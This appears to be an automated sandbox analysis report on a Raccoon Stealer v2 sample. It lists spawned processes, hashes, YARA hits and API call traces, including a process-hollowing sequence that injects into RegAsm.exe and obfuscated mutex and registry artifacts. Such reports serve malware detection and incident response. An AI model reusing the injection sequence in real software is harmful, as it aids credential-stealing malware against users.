Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe"
Imagebase:	0xec0000
File size:	5'374'505 bytes
MD5 hash:	20540CCD8F4132E0FFF9DAEC9F143997
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2_1, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000002.1286483341.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:23:51
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:23:51
Start date:	29/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xec0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000003.00000002.2418304008.0000000001586000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2_1, Description: Yara detected Raccoon Stealer v2, Source: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	14:23:51
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 760 -s 992
Imagebase:	0x5e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:45:02
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	35.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	21.1%
Total number of Nodes:	57
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 031E52E9 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 031E5458
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031E546B
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 031E5489
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 031E54AD
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 031E54D8
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 031E5530
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 031E557B
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 031E55B9
Wow64SetThreadContext.KERNEL32(?,?), ref: 031E55F5
ResumeThread.KERNELBASE(?), ref: 031E5604

Strings

ress, xrefs: 031E5373
Load, xrefs: 031E5327
GetP, xrefs: 031E536B
aryA, xrefs: 031E532F

Memory Dump Source

Source File: 00000000.00000002.1286461976.00000000031E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 031E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31e5000_SecuriteInfo.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: fe219483157d3fb540afa8d7d45945de4764cf764bb85a10b1953e92e2c5884f
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: ABB1E67660064AAFDB60CF68CC80BDA77A5FF8C714F158164EA0CAB341D774FA418B94

Uniqueness

Uniqueness Score: -1.00%

Function 030410D8 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 556
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0304134D

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 24b7ea7224dd5bf69f787df612ef53bb03b893dd1a1c4b94871e1af064eec63d
Instruction ID: d4aafb2be80daee988edcb1b242b6e62209c78a975e00ecc8563e040dfc53782
Opcode Fuzzy Hash: 24b7ea7224dd5bf69f787df612ef53bb03b893dd1a1c4b94871e1af064eec63d
Instruction Fuzzy Hash: 6732B170A002598FCB09CFA9C490A9DFBF6FF48314F59C5A9D459AB252CB34ED81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030418E0 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 03041984

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cf253f1ab8dbad7befe4a7ebe8ee95dc2821dee0ab3380ac3fe58c38a6619a50
Instruction ID: ab619f54f633feaac67efd2509674737f2d15ae6a90c2ea039dadb491a36a63c
Opcode Fuzzy Hash: cf253f1ab8dbad7befe4a7ebe8ee95dc2821dee0ab3380ac3fe58c38a6619a50
Instruction Fuzzy Hash: 323112B5D013099FCB14DFAAC884BDEFBF5FB48310F108429E919A7250C779AA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030418E8 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 03041984

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8d1f1a4405f8d70d567b5784c7b6a3d99b5e3c6f59d6547a616012965f524215
Instruction ID: 3bb45eede8de88f82271246560f9d9c4df188a6bc82520aea802bc1e4d820b43
Opcode Fuzzy Hash: 8d1f1a4405f8d70d567b5784c7b6a3d99b5e3c6f59d6547a616012965f524215
Instruction Fuzzy Hash: 8C21F3B5D013099FDB10DFAAD984ADEBBF5FF48310F108429E919A7240C775AA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03041750 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,00000000,?), ref: 030417D0

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 23d33bca4beb2737d5f19de83576795260fe148d4b51f30b8ba11cbdb419b280
Instruction ID: 9c0c7f45ff9c816f916d04700b91afb6a2374928582bf57e197bf2707f75cc6a
Opcode Fuzzy Hash: 23d33bca4beb2737d5f19de83576795260fe148d4b51f30b8ba11cbdb419b280
Instruction Fuzzy Hash: C02114B1C003099FDB10DFAAC981BEEBBF5FF48310F50842AE919A7240C7399941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03041828 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 03041895

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 54423cd836c673dfdf92046681d3cea94fd50a627e326afa600344ca5a6a416c
Instruction ID: 49bbc49f071eb6fa6f8a4276ba25ad2701856fada8de76c04ee8e2d2c0c7d5c7
Opcode Fuzzy Hash: 54423cd836c673dfdf92046681d3cea94fd50a627e326afa600344ca5a6a416c
Instruction Fuzzy Hash: F51137B5D002088FDB24DFAAC444BAEBBF5EB88310F14842AD415A7240CA395941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03041830 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 03041895

Memory Dump Source

Source File: 00000000.00000002.1286287388.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3040000_SecuriteInfo.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 07a9a1c34bf48b33a758f61f53c1a37be4064bbbc5f2059ed0ad6ff9b8fbb310
Instruction ID: c582bf16d52ac9f60bd3ef67e210274f19bc07cbc57bebce4b44b77e32c831b8
Opcode Fuzzy Hash: 07a9a1c34bf48b33a758f61f53c1a37be4064bbbc5f2059ed0ad6ff9b8fbb310
Instruction Fuzzy Hash: B81119B5D003498FDB24DFAAC445B9EFBF5EF48310F148429D515A7240CA796945CF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 4812, Parent PID: 760COMMON

Execution Graph

Execution Coverage:	26.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	96%
Total number of Nodes:	644
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00404B50 Relevance: 1398.7, APIs: 399, Strings: 399, Instructions: 2176
timesynchronizationregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLu4fdevhq), ref: 00404B6D
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404B79
CreateMutexA.KERNEL32(00000000,00000000,MTXq1n7w3bt), ref: 00404B82
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000000C3,00000000), ref: 00404B9E
RegOpenKeyExA.KERNEL32(80000001,reg0l6t893i,00000000,00020019,?), ref: 00404BBB
CloseHandle.KERNEL32(00000000), ref: 00404BC2
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h08jrwbj), ref: 00404BDD
SetEvent.KERNEL32(00000000), ref: 00404BE6
ResetEvent.KERNEL32(00000000), ref: 00404BED
FindFirstFileA.KERNEL32(s_bcfre8zh,?), ref: 00404C0F
FindClose.KERNEL32(00000000), ref: 00404C12
CreateMutexA.KERNEL32(00000000,00000000,MTXqtzx8hp7), ref: 00404C2B
ReleaseMutex.KERNEL32(00000000), ref: 00404C36
RegOpenKeyExA.ADVAPI32(80000001,regiwldu3lh,00000000,00020019,?), ref: 00404C53
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_bbz60kxw), ref: 00404C6E
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404C75
GetLastError.KERNEL32 ref: 00404C7B
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000BA0,00000000), ref: 00404C99
FindFirstFileA.KERNEL32(s_zlpk6fi9,?), ref: 00404CB5
FindClose.KERNEL32(00000000), ref: 00404CB8
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_tc91xtzg), ref: 00404CD3
SetEvent.KERNEL32(00000000), ref: 00404CDC
ResetEvent.KERNEL32(00000000), ref: 00404CE3
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_bvya3woa), ref: 00404CFE
SetEvent.KERNEL32(00000000), ref: 00404D07
ResetEvent.KERNEL32(00000000), ref: 00404D0E
LocalAlloc.KERNEL32(00000000,0000037F), ref: 00404D25
GetLastError.KERNEL32 ref: 00404D2D
LocalFree.KERNEL32(00000000), ref: 00404D3A
LocalAlloc.KERNEL32(00000000,0000068A), ref: 00404D4D
LocalFree.KERNEL32(00000000), ref: 00404D54
GetLastError.KERNEL32 ref: 00404D56
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_iysbipi4), ref: 00404D71
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404D77
OutputDebugStringA.KERNEL32(tsv0hbria), ref: 00404D88
SetEnvironmentVariableA.KERNEL32(iaat1l8d,4yz9begi), ref: 00404D96
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_68zl9c6n), ref: 00404DB4
SetEnvironmentVariableA.KERNEL32(c6nxfun9,vq8nojgl), ref: 00404DC3
CancelWaitableTimer.KERNEL32(?), ref: 00404DD1
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_0n85vc3v), ref: 00404DEA
GetLastError.KERNEL32 ref: 00404DEE
CancelWaitableTimer.KERNEL32(00000000), ref: 00404DF5
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tkqhivt6), ref: 00404E0E
RegOpenKeyExA.KERNEL32(80000001,regpnezg2ar,00000000,00020019,?), ref: 00404E2B
CancelWaitableTimer.KERNEL32(00000000), ref: 00404E32
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ahhs9tdw), ref: 00404E4D
GetLastError.KERNEL32 ref: 00404E51
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404E5C
LocalAlloc.KERNEL32(00000000,000001D3), ref: 00404E73
LocalFree.KERNEL32(00000000), ref: 00404E7A
OutputDebugStringA.KERNEL32(tl1wdo764), ref: 00404E85
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_bn76k1pi), ref: 00404E9A
OutputDebugStringA.KERNEL32(tzuizwazx), ref: 00404EA7
CancelWaitableTimer.KERNEL32(00000000), ref: 00404EAA
SetEnvironmentVariableA.KERNEL32(87039vfe,hr1ql1ui), ref: 00404EC4
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_kzkrrc42), ref: 00404EE3
OutputDebugStringA.KERNEL32(t8x0ufnff), ref: 00404EED
CancelWaitableTimer.KERNEL32(?), ref: 00404EF7
FindFirstFileA.KERNEL32(s_chnzpjge,?), ref: 00404F13
FindClose.KERNEL32(00000000), ref: 00404F1A
CreateMutexA.KERNEL32(00000000,00000000,MTXfk5pbuec), ref: 00404F33
ReleaseMutex.KERNEL32(00000000), ref: 00404F3E
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000497,00000000), ref: 00404F5C
CloseHandle.KERNEL32(00000000), ref: 00404F63
OutputDebugStringA.KERNEL32(tixn00umv), ref: 00404F6E
OutputDebugStringA.KERNEL32(ty46st8d5), ref: 00404F82
CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_biq7qqp8), ref: 00404F9B
CancelWaitableTimer.KERNEL32(00000000), ref: 00404F9E
CreateMutexA.KERNEL32(00000009,00000009,MTXdjgl1lda), ref: 00404FAB
CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_gxvpoqaz), ref: 00404FC3
CancelWaitableTimer.KERNEL32(00000000), ref: 00404FD0
SetEnvironmentVariableA.KERNEL32(ny8b8dyz,ajncq7cv), ref: 00404FE0
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000052A,00000000), ref: 00404FFE
FindCloseChangeNotification.KERNEL32(00000000), ref: 00405005
CreateMutexA.KERNEL32(00000000,00000000,MTX1foxa753), ref: 00405014
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_l9vi7zsm), ref: 0040502D
SetEnvironmentVariableA.KERNEL32(ppmrnxtn,t374uhtn), ref: 0040503B
CancelWaitableTimer.KERNEL32(00000000), ref: 00405048
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_upnz1jee), ref: 0040505D
OutputDebugStringA.KERNEL32(t811wbm0h), ref: 0040506B
CancelWaitableTimer.KERNEL32(?), ref: 00405075
GetLastError.KERNEL32 ref: 00405079
SetEnvironmentVariableA.KERNEL32(evp5wksa,8ch0b0dd), ref: 00405099
SetEnvironmentVariableA.KERNEL32(ohpcw67a,fz8ld49v), ref: 004050AF
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000DD9,00000000), ref: 004050C9
SetEnvironmentVariableA.KERNEL32(p8hh1gs2,bilwyweo), ref: 004050DB
FindCloseChangeNotification.KERNEL32(00000000), ref: 004050E2
FindFirstFileA.KERNEL32(s_b2q4tb82,?), ref: 004050FE
FindClose.KERNEL32(00000000), ref: 00405105
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_c6rtxn2e), ref: 00405120
RegOpenKeyExA.KERNEL32(80000001,reg9vp9wahe,00000000,00020019,00409E10), ref: 00405139
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040514A
CreateMutexA.KERNEL32(00000000,00000000,MTXeuk0bqyk), ref: 0040515F
GetLastError.KERNEL32 ref: 0040516C
ReleaseMutex.KERNEL32(?), ref: 00405175
OutputDebugStringA.KERNEL32(th2xy09eh), ref: 00405180
RegOpenKeyExA.ADVAPI32(80000001,regnw0xpzk8,00000000,00020019,?), ref: 00405199
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_nrrqvpp8), ref: 004051B2
CancelWaitableTimer.KERNEL32(00000000), ref: 004051BD
SetEnvironmentVariableA.KERNEL32(6pms62xl,gi25app2), ref: 004051CF
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jttod3t8), ref: 004051EA
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004051F1
RegOpenKeyExA.ADVAPI32(80000001,reg77ah2op2,00000000,00020019,?), ref: 0040520C
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLx4yqw1al), ref: 00405227
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040522E
SetEnvironmentVariableA.KERNEL32(ouljkvyw,tspltdjl), ref: 0040523A
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_4245xtfp), ref: 00405254
CancelWaitableTimer.KERNEL32(00000000), ref: 0040525B
RegOpenKeyExA.KERNEL32(80000001,regh037c70m,00000000,00020019,?), ref: 00405275
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_hkoaqvuo), ref: 0040528E
OutputDebugStringA.KERNEL32(t9lthrm9u), ref: 00405297
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004052A4
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000010E,00000000), ref: 004052BE
FindCloseChangeNotification.KERNEL32(00000000), ref: 004052C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_2lwdmtng), ref: 004052D4
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_5rwhgvw3), ref: 004052EF
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004052F6
RegOpenKeyExA.KERNEL32(80000001,reggwktxg2i,00000000,00020019,?), ref: 00405312
FindFirstFileA.KERNEL32(s_fh9hh7uu,?), ref: 0040532E
FindClose.KERNEL32(00000000), ref: 00405335
CreateMutexA.KERNEL32(00000000,00000000,MTXawf1ae1n), ref: 00405356
ReleaseMutex.KERNEL32(00000000), ref: 00405361
RegOpenKeyExA.ADVAPI32(80000001,regiepztbw6,00000000,00020019,?), ref: 00405382
OutputDebugStringA.KERNEL32(tw54zebwr), ref: 0040538D
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000007BA,00000000), ref: 004053AB
FindCloseChangeNotification.KERNEL32(00000000), ref: 004053AE
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000B2D,00000000), ref: 004053CC
RegOpenKeyExA.KERNEL32(80000001,regh57c5y01,00000000,00020019,?), ref: 004053E5
CloseHandle.KERNEL32(00000000), ref: 004053EC
LocalAlloc.KERNEL32(00000000,000001C3), ref: 00405404
CreateMutexA.KERNEL32(00000000,00000000,MTXa8cu8u0k), ref: 0040541B
OutputDebugStringA.KERNEL32(tgnaptnne), ref: 0040542C
ReleaseMutex.KERNEL32(00000000), ref: 0040542F
SetEnvironmentVariableA.KERNEL32(i32zb19a,qvmmqy34), ref: 0040543F
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_g0k9fdn1), ref: 00405458
OutputDebugStringA.KERNEL32(t8mzisows), ref: 00405465
CancelWaitableTimer.KERNEL32(00000000), ref: 0040546C
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLyoo3iq38), ref: 00405487
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405493
OutputDebugStringA.KERNEL32(tntjlvy28), ref: 0040549A
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLea771d1v), ref: 004054B1
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004054B8
RegOpenKeyExA.KERNEL32(80000001,regkukujc1n,00000000,00020019,?), ref: 004054D0
CreateMutexA.KERNEL32(00000000,00000000,MTXukdk5rol), ref: 004054E7
ReleaseMutex.KERNEL32(00000000), ref: 004054F2
LocalAlloc.KERNEL32(00000000,000009F5), ref: 00405512
RegOpenKeyExA.KERNEL32(80000001,regbssywy3j,00000000,00020019,?), ref: 0040552F
LocalFree.KERNEL32(00000000), ref: 00405536
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000002EF,00000000), ref: 00405554
RegOpenKeyExA.KERNEL32(80000001,regon8lhjmk,00000000,00020019,?), ref: 00405571
FindCloseChangeNotification.KERNEL32(00000000), ref: 00405578
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mkv5p20y), ref: 00405593
SetEvent.KERNEL32(00000000), ref: 0040559C
ResetEvent.KERNEL32(00000000), ref: 004055A3
CreateMutexA.KERNEL32(00000000,00000000,MTX659bq5ml), ref: 004055BC
ReleaseMutex.KERNEL32(00000000), ref: 004055C7
OutputDebugStringA.KERNEL32(tqmqpycwx), ref: 004055D4
SetEnvironmentVariableA.KERNEL32(y0t5yda9,jneak3tj), ref: 004055E0
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_d0ezvgky), ref: 004055F9
OutputDebugStringA.KERNEL32(tht6hiwda), ref: 00405602
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040560F
RegOpenKeyExA.KERNEL32(80000001,regnmhit5i7,00000000,00020019,?), ref: 00405630
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7zytb0ri), ref: 0040564B
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405652
RegOpenKeyExA.KERNEL32(80000001,regk6y32ko4,00000000,00020019,?), ref: 0040566D
GetLastError.KERNEL32 ref: 00405675
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLfg0ub50n), ref: 00405690
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405697
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zas83zwj), ref: 004056A3
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000777,00000000), ref: 004056C9
OutputDebugStringA.KERNEL32(t60xwhd9g), ref: 004056D6
FindCloseChangeNotification.KERNEL32(00000000), ref: 004056D9
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_942zrjhx), ref: 004056F4
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405700
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_l82rdxkg), ref: 00405715
SetEnvironmentVariableA.KERNEL32(ldop5nfk,93s4eclk), ref: 00405728
CancelWaitableTimer.KERNEL32(?), ref: 00405736
OutputDebugStringA.KERNEL32(t1f98jrxw), ref: 00405741
RegOpenKeyExA.ADVAPI32(80000001,regkj50vwml,00000000,00020019,?), ref: 0040575A
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_08qed3dz), ref: 00405773
CancelWaitableTimer.KERNEL32(00000000), ref: 0040577E
GetLastError.KERNEL32 ref: 00405784
RegOpenKeyExA.ADVAPI32(80000001,regso4yxzed,00000000,00020019,?), ref: 004057A1
FindFirstFileA.KERNEL32(s_0rhtpalp,?), ref: 004057BD
FindClose.KERNEL32(00000000), ref: 004057C4
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rv9lsjh5), ref: 004057DD
GetLastError.KERNEL32 ref: 004057E6
CancelWaitableTimer.KERNEL32(?), ref: 004057F4
OutputDebugStringA.KERNEL32(tkcq1j60r), ref: 00405801
CreateMutexA.KERNEL32(00000000,00000000,MTX34s52bf3), ref: 00405816
ReleaseMutex.KERNEL32(00000000), ref: 00405821
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLit26gd8c), ref: 0040583C
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405843
LocalAlloc.KERNEL32(00000000,00000221), ref: 0040584D
FindFirstFileA.KERNEL32(s_eutb36gm,?), ref: 00405869
FindClose.KERNEL32(00000000), ref: 00405870
CreateMutexA.KERNEL32(00000000,00000000,MTXrulvz4cj), ref: 00405887
RegOpenKeyExA.KERNEL32(80000001,regcybb0am7,00000000,00020019,?), ref: 004058A8
ReleaseMutex.KERNEL32(00000000), ref: 004058AF
GetLastError.KERNEL32 ref: 004058BC
OutputDebugStringA.KERNEL32(tlsubx3d4), ref: 004058C7
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_llytb8bk), ref: 004058DE
OutputDebugStringA.KERNEL32(tgwabdohg), ref: 004058E7
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004058F5
CreateMutexA.KERNEL32(00000000,00000000,MTXj7l6ka3u), ref: 00405908
ReleaseMutex.KERNEL32(00000000), ref: 00405913
RegOpenKeyExA.ADVAPI32(80000001,regfaerruq6,00000000,00020019,?), ref: 0040592F
RegOpenKeyExA.KERNEL32(80000001,regjj3pi0uk,00000000,00020019,?), ref: 00405957
CreateSemaphoreA.KERNEL32(00000001,00000001,00000001,XMLrxdfmajw), ref: 00405975
ReleaseSemaphore.KERNEL32(00000000,00000001,00000001), ref: 0040597B
GetLastError.KERNEL32 ref: 0040597D
CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_8q2mlbb1), ref: 0040599F
CreateEventA.KERNEL32(00000001,00000001,00000001,ev_2yigbh0u), ref: 004059B8
SetEvent.KERNEL32(00000000), ref: 004059C1
ResetEvent.KERNEL32(00000000), ref: 004059C8
CreateSemaphoreA.KERNEL32(00000001,00000001,00000001,XML796zf9ly), ref: 004059E1
ReleaseSemaphore.KERNEL32(00000000,00000001,00000001), ref: 004059E7
GetLastError.KERNEL32 ref: 004059F6
CreateWaitableTimerA.KERNEL32(00000003,00000001,WTMR_yjyspzjz), ref: 00405A13
OutputDebugStringA.KERNEL32(t177nyisu), ref: 00405A20
CancelWaitableTimer.KERNEL32(00000000), ref: 00405A27
SetEnvironmentVariableA.KERNEL32(h3srciic,gtks8w9w), ref: 00405A43
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mf0tns34), ref: 00405A5E
SetEvent.KERNEL32(00000000), ref: 00405A67
ResetEvent.KERNEL32(00000000), ref: 00405A6E
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdv4yvvx2), ref: 00405A89
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405A8F
OutputDebugStringA.KERNEL32(tw931ljur), ref: 00405A9A
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000037B,00000000), ref: 00405AB5
FindCloseChangeNotification.KERNEL32(00000000), ref: 00405ABC
LocalAlloc.KERNEL32(00000000,0000037B), ref: 00405AC6
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_1yp16plg), ref: 00405AE5
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_vo68bl08), ref: 00405AFC
SetEvent.KERNEL32(00000000), ref: 00405B01
ResetEvent.KERNEL32(00000000), ref: 00405B08
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000999,00000000), ref: 00405B26
